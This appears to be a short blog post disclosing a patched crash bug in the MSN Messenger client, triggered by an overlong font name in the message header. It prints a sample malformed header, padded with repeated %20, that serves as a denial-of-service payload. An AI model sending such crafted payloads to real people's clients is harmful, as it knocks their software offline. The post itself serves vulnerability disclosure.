This flaw makes the MSN Messenger client crash after receiving a misformated font variable in the message header with instant messages.
How Does It Work?
The MSN Messenger client works by sending a header with every message. So every time a user wants to send a message, it generates a header, containing information about the font, the colour of the message and some other information.
The Flaw
A normal message looks something like this:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you?
When we replace the font field with something very large, the message will look like this:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20New%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you?
As a result the MSN Messenger client will crash. This flaw is a severe danger, as it's not so hard for hackers to use this flaw. Microsoft has been informed on this issue. When this was fixed, shortly after it was discovered that instead of using %20 for the spaces, the html equivalent: would produce the same results. This has since been fixed.
Credits
|M|K discovered this bug a while ago, but decided not to go public. Then Xerxes investigated and sent it over to Mess with MSN Messenger.
0 Responses to “The font crash”
Leave a Reply